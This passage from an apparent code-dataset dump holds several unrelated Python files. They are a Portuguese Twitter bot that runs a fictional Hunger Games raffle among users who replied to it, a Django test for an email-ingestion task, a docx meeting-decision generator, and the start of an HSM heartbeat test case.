arq.close()\r\n tweetarXmin(statusText, 1800)\r\n # endregion\r\n\r\n print(\"Pegando nomes do último status\")\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}',result_type=\"recent\", since_id=tweet.id, tweet_mode='extended').items()\r\n #replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}', since_id=tweet.id, tweet_mode='extended').items()\r\n participantesVivos = [[]]\r\n participantesOriginais = [[]]\r\n participantesVivosLista = []\r\n cont = 0\r\n i = 0\r\n '''\r\n while cont < 24:\r\n\r\n #region Juntando os participantes das respostas do ultimo tweet nos vetores de participantes\r\n try:\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n reply = replies.next()\r\n # print(reply.user.screen_name)\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if(adicionado):\r\n continue\r\n participantesVivosLista.append(reply.user.screen_name)\r\n \r\n #cont += 1\r\n except:\r\n print(\"Não há mais replies\")\r\n break\r\n #endregion\r\n '''\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if (participante == reply.user.screen_name):\r\n print(\"Participante já adicionado\")\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n\r\n print(f\"Participantes: {participantesVivosLista}\")\r\n\r\n #region Juntando 24 pessoas aleatórias das que responderam o último tweet (pra não ser os primeiros)\r\n cont = 0\r\n i = 0\r\n if (len(participantesVivosLista) >= 24):\r\n participantesVivosLista = random.sample(participantesVivosLista, 24)\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n if (cont == 24):\r\n break\r\n else:\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n # endregion\r\n\r\n #region Adicionado listas predefinidas para testes\r\n #participantesVivos = [['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesOriginais = [['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesVivosLista = ['Gabriel3wefsd','Werneckasfq','Yasminhtyhd','Mayaraffrewg','Lucianosdgvrth','Tutdasgwefgs','Gustavobtgym','Amandaikghd','Pedroryjfs','Maryyxjvfb','Douglasxhjxdh','Caiolmxzsdk','AGabriel3wefsd','AWerneckasfq','AYasminhtyhd','AMayaraffrewg','ALucianosdgvrth','ATutdasgwefgs','AGustavobtgym','AAmandaikghd','APedroryjfs','AMaryyxjvfb','ADouglasxhjxdh','ACaiolmxzsdk']\r\n #cont = 24\r\n #endregion\r\n\r\n\r\n #region Não há pessoas suficientes pra prosseguir o evento, completando com bots!\r\n if (cont < 24):\r\n file = open(\"bots.txt\", \"r\")\r\n bots = file.readlines()\r\n file.close()\r\n qtdBots = 24 - cont\r\n listaBots = random.sample(bots, qtdBots)\r\n while cont < 24:\r\n bot = listaBots.pop()\r\n num = str(random.randint(100,999))\r\n participantesVivos[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesOriginais[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesVivosLista.append(\"Bot\"+bot.strip()+str(num))\r\n if (cont % 2 == 1):\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n print(participantesOriginais)\r\n #endregion\r\n\r\n #region Carregando as frases de 'frases HG.txt' em seus respectivos vetores e misturando os vetores\r\n frasesHGTXT = open(\"frases HG.txt\",\"r\")\r\n momento = \"\"\r\n mataMata, causasNaturais, items, noite, noiteEmDupla = [], [], [], [], []\r\n for linha in frasesHGTXT:\r\n if(linha.strip().isupper()):\r\n momento = linha.strip()\r\n continue\r\n if(momento == \"MATA MATA\"):\r\n mataMata.append(linha.strip())\r\n continue\r\n elif(momento == \"CAUSAS NATURAIS\"):\r\n causasNaturais.append(linha.strip())\r\n continue\r\n elif(momento == \"ITEMS\"):\r\n items.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE\"):\r\n noite.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE EM DUPLA\"):\r\n noiteEmDupla.append(linha.strip())\r\n continue\r\n\r\n frasesHGTXT.close()\r\n cMM, cCN, cI, cN, cNED = 0, 0, 0, 0, 0\r\n mataMata = random.sample(mataMata,len(mataMata))\r\n causasNaturais = random.sample(causasNaturais, len(causasNaturais))\r\n items = random.sample(items, len(items))\r\n noite = random.sample(noite, len(noite))\r\n noiteEmDupla = random.sample(noiteEmDupla, len(noiteEmDupla))\r\n #endregion\r\n\r\n #region Carregando vetores com dizeres quando não acontece o evento\r\n eventoSemTiro = ['Sem tiros de canhão hoje\\n\\nsó isso mesmo','Não houveram mortes hoje','Ninguém morreu hoje\\nimpressionante, mas o jogo tem que continuar :)','Não houveram tiros de canhão hoje\\nserá que hoje os tributos dormem mais tranquilos?', 'Nenhum tiro de canhão foi dado hoje']\r\n eventoSemTiro = random.sample(eventoSemTiro, len(eventoSemTiro))\r\n cEST = 0\r\n\r\n eventoCombatesDiretos = ['Os tributos não se encontraram no soco hoje\\nsorte? acho que não\\ncoincidência? talvez\\nhotel? trivago','Ninguém encontrou ninguém\\nNinguém matou ninguém\\nsem combates diretos hoje','Não houveram mano a mano hoje\\nmas aposto que amanhã vai ter ;)','Vem pro x1! não?\\nta, hoje não teve x1']\r\n eventoCombatesDiretos = random.sample(eventoCombatesDiretos, len(eventoCombatesDiretos))\r\n cECD = 0\r\n # endregion\r\n\r\n #region Apresentação dos tributos, pegar os tributos do vetor dos participantes que entraram no evento (+300 segs)\r\n statusText = '''Conheçam os tributos:'''\r\n i = 0\r\n participantesVivos.pop()\r\n metade = False\r\n for linha in participantesVivos:\r\n statusText += f\"\\nD{i + 1}:\"\r\n for pessoa in linha:\r\n statusText += \" @\"+pessoa+\" e\"\r\n statusText = statusText[:-2]+\"\"\r\n i += 1\r\n if (i % (len(participantesVivos)/2) == 0 and not metade):\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n metade = True\r\n statusText += \"\\nCom isso fecham os tributos selecionados\"\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText,300,tweet)\r\n # endregion\r\n\r\n acabou = False\r\n dia = 1\r\n primeiroMomento = True\r\n while not acabou:\r\n aindaNaoMataram = participantesVivosLista.copy()\r\n mortesDoDia = []\r\n\r\n #region Primeiro momento, evento de abertura da cornucópia\r\n if (primeiroMomento):\r\n primeiroMomento = False\r\n addSorte = 0\r\n sorte = 0\r\n statusText = \"\"\r\n dado = random.randint(1,100)\r\n if (dado % 42 == 0):\r\n morre = participantesVivosLista[random.randint(0,len(participantesVivosLista) - 1)]\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n mortesDoDia.append(morre)\r\n statusText += f\"\\na plataforma de @{morre} explode pq começou se afobou\"\r\n statusText += f\"\\ncomeça a corrida, alguns se escondem, outros tentam a sorte na cornucopia, sangue rola logo no início\"\r\n while sorte <= 45:\r\n if (len(aindaNaoMataram) < 2):\r\n break\r\n mata, morre = random.sample(aindaNaoMataram, 2)\r\n aindaNaoMataram.remove(mata)\r\n aindaNaoMataram.remove(morre)\r\n\r\n\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n statusText += f\"\\n@{mata} matou @{morre} {mataMata[cMM]}\"\r\n cMM += 1\r\n mortesDoDia.append(morre)\r\n\r\n addSorte += random.randint(10,15)\r\n sorte = random.randint(0, 100) + addSorte\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n\r\n\r\n tweetarXmin(statusText, 150)\r\n # endregion\r\n\r\n if (acabou):\r\n break\r\n\r\n #region evento de x1 onde pessoa X mata pessoa Y (+30~300 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,200)\r\n contador = 1\r\n metade = False\r\n statusText = f\"Dia {dia}:\"\r\n if (sorte > 180):\r\n statusText += \"\\n\" + eventoCombatesDiretos[cECD]\r\n cECD += 1\r\n while sorte <= 180:\r\n if (len(aindaNaoMataram) < 2):\r\n break\r\n mata, morre = random.sample(aindaNaoMataram, 2)\r\n aindaNaoMataram.remove(mata)\r\n aindaNaoMataram.remove(morre)\r\n\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos,\r\n participantesVivosLista, morre)\r\n statusText += f\"\\n@{mata} matou @{morre} {mataMata[cMM]}\"\r\n cMM += 1\r\n mortesDoDia.append(morre)\r\n contador += 1\r\n\r\n\r\n addSorte += random.randint(30, 35)\r\n sorte = random.randint(0, 100) + addSorte\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n if(not contador % MAX_LINHAS == 0):\r\n if(metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, min(300, 15*contador), tweet)\r\n else:\r\n tweetarXmin(statusText, min(15*contador, 300))\r\n statusText = ''\r\n else:\r\n esperar(min(300, 15*contador))\r\n #endregion\r\n\r\n #region Evento morrer sozinho (+15~300 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,100)\r\n contador = 1\r\n metade = False\r\n statusText = f\"Dia {dia}:\"\r\n\r\n if (sorte > 80):\r\n statusText = \"\"\r\n while sorte <= 75:\r\n addSorte += random.randint(15, 20)\r\n sorte = random.randint(0,100) + addSorte\r\n morre = random.sample(participantesVivosLista, 1)[0]\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n mortesDoDia.append(morre)\r\n contador += 1\r\n\r\n statusText += f\"\\n@{morre} {causasNaturais[cCN]}\"\r\n cCN += 1\r\n if(len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n if(statusText):\r\n if(not metade):\r\n tweetarXmin(statusText, 15*contador)\r\n else:\r\n esperar(15*contador)\r\n #endregion\r\n\r\n #region Patrocinador ajudando (150 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,100)\r\n statusText = f\"Dia {dia}:\"\r\n if (sorte <= 10):\r\n sortudo = random.sample(participantesVivosLista, 1)[0]\r\n statusText += f\"\\nolha que sorte\\nparece que os patrocinadores estão de olho em @{sortudo} e lhe deram {items[cI]}\\nesperamos que saiba como utilizar\"\r\n cI += 1\r\n tweetarXmin(statusText, 150)\r\n #endregion\r\n\r\n #region Anunciar mortos do dia se não tiver terminado o evento\r\n if(len(mortesDoDia) == 0):\r\n statusText = eventoSemTiro[cEST]\r\n cEST += 1\r\n tweetarXmin(statusText, 180)\r\n else:\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n break\r\n #endregion\r\n\r\n #region Evento para os 2 útilmos participantes\r\n if (len(participantesVivosLista) == 2):\r\n statusText = \"\"\r\n dado = random.randint(1, 200)\r\n if (dado == 99):\r\n statusText = f'''\r\n@{participantesVivosLista[0]} já não é a mesma pessoa de quando começou.\r\n@{participantesVivosLista[1]} também não está nada bem\r\nambos se encontram na cornucopia\r\nlágrimas escorrem\r\nambos se encaram\r\no destino é certo\r\n...\r\nambos decidem se matar em protesto ao banho de sangue\r\n'''\r\n tweetarXmin(statusText, 0)\r\n return None\r\n mata, morre = random.sample(participantesVivosLista, 2)\r\n\r\n statusText += f\"Os ultimos sobreviventes se encontram\\nUtilizam de todo seu potencial e\\n@{mata} mata @{morre}\\ntornando-se a última pessoa de pé em uma arena ensanguentada\\nParabéns merecidamente!\\nSigam a página, RT+Fav :]\"\r\n\r\n tweetarXmin(statusText, 0)\r\n return None\r\n #endregion\r\n\r\n #region Evento da noite (30~300 segs)\r\n\r\n addSorte = 0\r\n sorte = random.randint(0, 100)\r\n statusText = f\"Noite {dia}:\"\r\n listaNoite = random.sample(participantesVivosLista, len(participantesVivosLista))\r\n contador = 1\r\n\r\n metade = False\r\n while sorte <= 100:\r\n addSorte += random.randint(15, 30)\r\n sorte = random.randint(0, 60)\r\n dado = random.randint(0, 4)\r\n if (dado):\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} {noite[cN]}\"\r\n cN += 1\r\n elif (len(listaNoite) >= 2 and len(participantesVivosLista) >= 4):\r\n pessoa, dupla = listaNoite.pop(), listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} e @{dupla} {noiteEmDupla[cNED]}\"\r\n cNED += 1\r\n else:\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} achou {items[cI]}\"\r\n cI += 1\r\n if (not listaNoite):\r\n break\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n statusText = ''\r\n if (not metade):\r\n tweetarXmin(statusText, 15 * contador)\r\n else:\r\n esperar(15 * contador)\r\n # endregion\r\n\r\n dia += 1\r\n\r\n #region 1 sobreviveu\r\n vencedor = participantesVivosLista[0]\r\n statusText = f'''\r\nDepois de muita luta, fuga, camuflagem e esperteza\r\nquem sobreviveu foi @{vencedor}\r\n\r\nParabéns, merecidamente\r\n\r\nSigam a página para mais eventos, Fav+RT = Humilde :]\r\n'''\r\n tweetarXmin(statusText, 0)\r\n #endregion\r\n\r\n\r\n\r\ndef tweetToTwitter():\r\n while True:\r\n #emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n\r\n #qlPostar = 2\r\n qlPostar = random.randint(0, QTDEVENTOS - 1)\r\n # DNA Random\r\n if(qlPostar == 0):\r\n emotesUsar = list(random.sample(todosEmotes, random.randint(1, 4)))\r\n statusText = f'''{frases[random.randint(0, len(frases)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜\r\n⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜\r\n{emotesUsar[random.randint(0,len(emotesUsar)-1)]}⬜⬜⬜{emotesUsar[random.randint(0,len(emotesUsar)-1)]}\r\n'''\r\n # DNA 2 emojis\r\n elif (qlPostar == 1):\r\n emotesUsar = list(random.sample(todosEmotes, 2))\r\n statusText = f'''{frases[random.randint(0, len(frases) - 1)]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n⬜⬜{emotesUsar[0]}⬜⬜\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n{emotesUsar[1]}⬜⬜⬜{emotesUsar[0]}\r\n⬜{emotesUsar[1]}⬜{emotesUsar[0]}⬜\r\n⬜⬜{emotesUsar[1]}⬜⬜\r\n⬜{emotesUsar[0]}⬜{emotesUsar[1]}⬜\r\n{emotesUsar[0]}⬜⬜⬜{emotesUsar[1]}\r\n '''\r\n # Guerra de emoji\r\n elif (qlPostar == 2):\r\n emotesUsar = list(random.sample(todosEmotes, 3))\r\n statusText = f'''\r\n QUEM GANHA??\r\n RT | FAV\r\n{emotesUsar[0]}⬜⬜⬜🆚⬜⬜⬜{emotesUsar[2]}\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜⬜{emotesUsar[2]}⬜\r\n{emotesUsar[0]}⬜⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n⬜⬜⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜{emotesUsar[0]}⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜⬜⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚⬜{emotesUsar[2]}⬜⬜\r\n⬜⬜⬜{emotesUsar[0]}🆚⬜⬜{emotesUsar[2]}⬜\r\n⬜{emotesUsar[0]}⬜⬜🆚{emotesUsar[2]}⬜⬜⬜\r\n'''\r\n\r\n print('\\nTweetando:')\r\n print(statusText)\r\n resp = input(\"Publicar?(S/N)\\n\")\r\n if(resp == \"S\" or resp == \"s\"):\r\n api.update_status(status=statusText)\r\n break\r\n resp = input(\"Gerar outro?(S/N)\\n\")\r\n if (resp == \"N\" or resp == \"n\"):\r\n break\r\n\r\n\r\ndef main():\r\n print('Bom dia')\r\n for categoria in emojis.db.get_categories():\r\n #print(categoria)\r\n for emote in emojis.db.get_emojis_by_category(categoria):\r\n #print(emote[1])\r\n if(len(emote[1]) == 1):\r\n todosEmotes.append(emote[1])\r\n #print(todosEmotes)\r\n resp = input('''\r\n Escolha uma opção:\r\n 1 - Tweetar\r\n 2 - Rodar HG\r\n S - sair\r\n ''')\r\n if(resp == \"1\"):\r\n tweetToTwitter()\r\n elif (resp == \"2\"):\r\n hungerGamesEvent()\r\n else:\r\n print('flw enton')\r\nif __name__ == \"__main__\":\r\n hungerGamesEvent()\r\n #main()","repo_name":"gabrielhbcs/emojiCreatorBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":27678,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39330165340","text":"from unittest import mock\n\nimport pytest\nfrom django.test.utils import override_settings\n\nfrom datahub.email_ingestion.mailbox import MailboxHandler\nfrom datahub.email_ingestion.tasks import ingest_emails\nfrom datahub.email_ingestion.test.utils import MAILBOXES_SETTING, mock_import_string\nfrom datahub.feature_flag.models import FeatureFlag\nfrom datahub.feature_flag.test.factories import FeatureFlagFactory\nfrom datahub.interaction import INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME\n\n\n@pytest.fixture()\ndef interaction_email_ingestion_feature_flag():\n \"\"\"\n Creates the email ingestion feature flag.\n \"\"\"\n yield FeatureFlagFactory(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures('interaction_email_ingestion_feature_flag')\nclass TestIngestEmails:\n \"\"\"\n Test ingest_emails celery task.\n \"\"\"\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are processed when the lock is acquired.\n \"\"\"\n # Mock import_string to avoid import errors for processor_class path strings\n mock_import_string(monkeypatch)\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Refresh the mailbox_handler singleton as we have overidden the MAILBOXES setting\n mailbox_handler = MailboxHandler()\n mailbox_handler.initialise_mailboxes()\n monkeypatch.setattr(\n 'datahub.email_ingestion.tasks.mailbox_handler',\n mailbox_handler,\n )\n ingest_emails()\n assert process_new_mail_patch.call_count == 2\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_emails_lock_not_acquired(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the lock cannot be acquired successfully.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n # Have to mock rather than acquire the lock as locks are per connection (if the lock is\n # already held by the current connection, the current connection can still re-acquire it).\n advisory_lock_mock = mock.MagicMock()\n advisory_lock_mock.return_value.__enter__.return_value = False\n monkeypatch.setattr('datahub.email_ingestion.tasks.advisory_lock', advisory_lock_mock)\n\n ingest_emails()\n assert process_new_mail_patch.called is False\n\n @override_settings(MAILBOXES=MAILBOXES_SETTING)\n def test_ingest_feature_flag_inactive(self, monkeypatch):\n \"\"\"\n Test that our mailboxes are not processed when the feature flag is not active.\n \"\"\"\n process_new_mail_patch = mock.Mock()\n # ensure that the process_new_mail method is a mock so we can interrogate later\n monkeypatch.setattr(\n 'datahub.email_ingestion.mailbox.Mailbox.process_new_mail',\n process_new_mail_patch,\n )\n flag = FeatureFlag.objects.get(code=INTERACTION_EMAIL_INGESTION_FEATURE_FLAG_NAME)\n flag.is_active = False\n flag.save()\n\n ingest_emails()\n assert process_new_mail_patch.called is False\n","repo_name":"uktrade/data-hub-api-actions-test","sub_path":"datahub/email_ingestion/test/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22604732728","text":"import docx\nimport time as t\nfrom docx.shared import Pt, Mm\nfrom docx.enum.text import WD_PARAGRAPH_ALIGNMENT, WD_LINE_SPACING\n\n\ndef create_decision(name, type, date_time, form, questions, zaoch_list, protocol_date, current_date):\n new_form = form.replace('ой', 'ого')\n type = type.replace('ое', 'ого')\n total_ochno = questions[0].yes + questions[0].no + questions[0].idk\n total_zaochno = zaoch_list[0][0]+zaoch_list[0][1]+zaoch_list[0][2]\n\n if (total_ochno + total_zaochno) > 0.5*49:\n quorum = 'да'\n else:\n quorum = 'нет'\n\n doc = docx.Document(name)\n for para in doc.paragraphs:\n text = para.text\n text = text.replace('<
>', new_form)\n text = text.replace('<>', type)\n text = text.replace('<>', current_date)\n para.text = text\n\n for question in questions:\n p = doc.add_paragraph(question.question)\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(f'Решение: {question.decision}')\n p.paragraph_format.first_line_indent = Mm(7.5)\n\n if new_form == 'очно-заочного':\n doc.add_paragraph()\n p = doc.add_paragraph(\n 'Решение принято на основании голосования в очно-заочной форме путем суммы голосов за очную часть голосования и заочную часть голосования.')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(f'Общее количество членов СНТ 1: 49')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(\n f'Очно: {total_ochno}'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(\n f'Заочно: {total_zaochno}'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n if quorum == 'да':\n p = doc.add_paragraph(\n f'Кворум установлен ({total_ochno + total_zaochno} голосов в сумме)'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n else:\n p = doc.add_paragraph(\n f'Кворум не установлен ({total_ochno + total_zaochno} голосов в сумме)'\n )\n p.paragraph_format.first_line_indent = Mm(7.5)\n\n doc.add_paragraph()\n doc.add_paragraph()\n p = doc.add_paragraph(f'Председатель правления СНТ « СНТ 1».')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph('[подпись]_____________/[расшифровка] Кузнецов С.М.')\n p.paragraph_format.first_line_indent = Mm(7.5)\n p = doc.add_paragraph(f'Дата {current_date}')\n p.paragraph_format.first_line_indent = Mm(7.5)\n style = doc.styles['Normal']\n style.font.name = 'Times New Roman'\n style.font.size = Pt(14)\n for para in range(4, len(doc.paragraphs)):\n doc.paragraphs[para].paragraph_format.line_spacing_rule = WD_LINE_SPACING.ONE_POINT_FIVE\n doc.paragraphs[para].alignment = WD_PARAGRAPH_ALIGNMENT.JUSTIFY\n name = f'reshenie_{int(t.time())}.docx'\n doc.save(f'./uploads/{name}')\n return name","repo_name":"sevagrbnv/konsultant","sub_path":"djangoproject/Utils/DecisionCreator.py","file_name":"DecisionCreator.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74670937389","text":"from .case import TestCase, TestCaseError\nimport secp256k1 as ec\nimport hmac\nimport hashlib\n\n\nclass Heartbeat(TestCase):\n EXPECTED_HEADER = \"HSM:SIGNER:HB:4.0:\"\n EHL = len(EXPECTED_HEADER)\n\n @classmethod\n def op_name(cls):\n return \"heartbeat\"\n\n def __init__(self, spec):\n self.ud_value = spec[\"udValue\"]\n\n super().__init__(spec)\n\n def run(self, dongle, debug, run_args):\n def normalize_hex_sig_component(h):\n h = 